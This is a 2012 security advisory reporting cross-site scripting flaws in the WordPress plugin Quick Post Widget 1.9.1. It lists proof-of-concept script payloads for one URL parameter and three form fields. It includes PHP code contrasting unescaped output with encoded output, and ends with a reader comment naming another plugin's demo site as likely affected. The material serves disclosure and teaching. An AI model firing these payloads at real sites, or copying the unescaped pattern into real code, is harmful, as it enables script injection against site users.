SSCHADV2012-016 - WordPress Plugin 'Quick Post Widget' 1.9.1 Multiple XSS vulnerabilities
Advisory: WordPress Plugin 'Quick Post Widget' 1.9.1 Multiple XSS vulnerabilities
Advisory ID: SSCHADV2012-016
Author: Stefan Schurtz
Affected Software: Successfully tested on Quick Post Widget 1.9.1
Vendor URL:
Vendor Status: informed
CVE-ID: CVE-2012-4226
======================
Vulnerability Description
======================
The WordPress plugin Quick Post Widget 1.9.1 is prone to multiple XSS vulnerabilities.
==============
PoC-Exploit
==============
// GET
http://[target]/wordpress/?"></script><script>alert(/xss/)</script>
// POST
http://[target]/wordpress/ -> Quickpost ‘Title’ -> "></script><script>alert(/xss/)</script>
http://[target]/wordpress/ -> Quickpost ‘Content’ -> "></script><script>alert(/xss/)</script>
http://[target]/wordpress/ -> Quickpost ‘New category’ -> "></script><script>alert(/xss/)</script>
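The PoC above shows the same pattern in every case: a value taken from the request (the query string, or the Title, Content and New category fields) is written back into the page without encoding, so a double quote closes the attribute it sits in and the remainder is parsed as markup. The following is an added illustration, not the plugin's own code, of that defect beside its fix: render_vulnerable() reproduces the unescaped output, render_hardened() encodes each value for the HTML context it lands in. The field names, the markup and the idea that the query string is reflected into the form's action attribute are assumptions made for the example; inside WordPress the same encoding is done with esc_attr() and esc_html().

```php
<?php
// Added example (not the Quick Post Widget's code). Field names, markup and
// the reflected request URI are assumptions for illustration.

function render_vulnerable(array $fields): string
{
    // Untrusted input placed straight into attribute values and element
    // content: a double quote in the input closes the attribute, and
    // everything after it is parsed as markup by the browser.
    return '<form method="post" action="' . $fields['request_uri'] . '">' . "\n"
         . '<input type="text" name="title" value="' . $fields['title'] . '">' . "\n"
         . '<textarea name="content">' . $fields['content'] . '</textarea>' . "\n"
         . '<input type="text" name="new_category" value="' . $fields['new_category'] . '">' . "\n"
         . '</form>';
}

function esc(string $value): string
{
    // Plain-PHP equivalent of WordPress's esc_attr()/esc_html(): encode
    // &, <, >, " and ' so the value is rendered as text, never as markup.
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_hardened(array $fields): string
{
    // Every request-derived value is encoded at the point of output. In a
    // WordPress plugin use esc_attr() inside attributes and esc_html() for
    // element content; esc_url() would be the right choice for the action.
    return '<form method="post" action="' . esc($fields['request_uri']) . '">' . "\n"
         . '<input type="text" name="title" value="' . esc($fields['title']) . '">' . "\n"
         . '<textarea name="content">' . esc($fields['content']) . '</textarea>' . "\n"
         . '<input type="text" name="new_category" value="' . esc($fields['new_category']) . '">' . "\n"
         . '</form>';
}

function output_is_inert(string $html): bool
{
    // Regression check a plugin test suite could keep: no raw script tag
    // may survive encoding of the request-derived values.
    return stripos($html, '<script') === false;
}

// Constructed input using the payload quoted in the advisory's PoC section.
$payload = '"></script><script>alert(/xss/)</script>';
$fields = [
    'request_uri'  => '/wordpress/?' . $payload,
    'title'        => $payload,
    'content'      => $payload,
    'new_category' => $payload,
];

echo "--- vulnerable output (payload breaks out of the attribute) ---\n";
echo render_vulnerable($fields), "\n\n";
echo "--- hardened output (payload rendered as inert text) ---\n";
echo render_hardened($fields), "\n\n";

echo 'vulnerable inert: ', var_export(output_is_inert(render_vulnerable($fields)), true), "\n";
echo 'hardened inert:   ', var_export(output_is_inert(render_hardened($fields)), true), "\n";
```

In the hardened output each occurrence of the payload appears as `&quot;&gt;&lt;/script&gt;&lt;script&gt;alert(/xss/)&lt;/script&gt;`, so the attribute stays closed only where the template closes it. Encoding at output, per context, is the fix; stripping `<script` from input is not, since the same value reaches other contexts (JavaScript strings, URLs) where HTML encoding is not the right escape.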
=====
Solution
=====
-
================
Disclosure Timeline
================
02-Jul-2012 – developer informed
09-Jul-2012 – developer feedback
10-Aug-2012 – post on BugTraq
====
Credits
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References
=======
Comments
Gregory Gray on :
Sorry, no German.
Competing plugin ucan-post seems similarly affected based upon a quick test at their demo website: http://cartpauj.icomnow.com/ucan-demo/?ucanaction=ucanpublish
I assume TDO Mini Forms is also affected as their download has been removed, much as quick post widget.
Cheers and thanks for the original info… working to fix my install or release patched fork.
G